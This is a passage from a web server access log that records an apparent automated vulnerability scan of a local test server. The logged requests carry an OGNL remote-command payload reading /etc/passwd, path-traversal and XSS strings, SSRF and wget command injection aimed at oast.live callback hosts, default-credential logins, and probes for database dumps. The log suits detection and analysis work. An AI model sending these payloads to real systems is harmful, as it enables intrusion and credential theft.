HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v2/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRRestService/unauthenticatedAPI/v1/docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /FileZilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://ca28fg0smpvbd3qg07h0m9ij69mj7rcd9.oast.live/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://ca28fg0smpvbd3qg07h0ktm9g5pgg4ms9.oast.live/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://ca28fg0smpvbd3qg07h0diy4cr598qrzd.oast.live\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/sharelinks/1.0/link?url=https://ca28fg0smpvbd3qg07h0zm1eg9whpo6sh.oast.live/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://ca28fg0smpvbd3qg07h0hnhfjno5jqrwd.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS /api/v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uploads/assets/backend/elfinder/elfinder-cke.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca28fg0smpvbd3qg07h0kbqygiyp69moj.oast.live\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?plot=;wget%20http://ca28fg0smpvbd3qg07h03kgtn7bxczoid.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:37 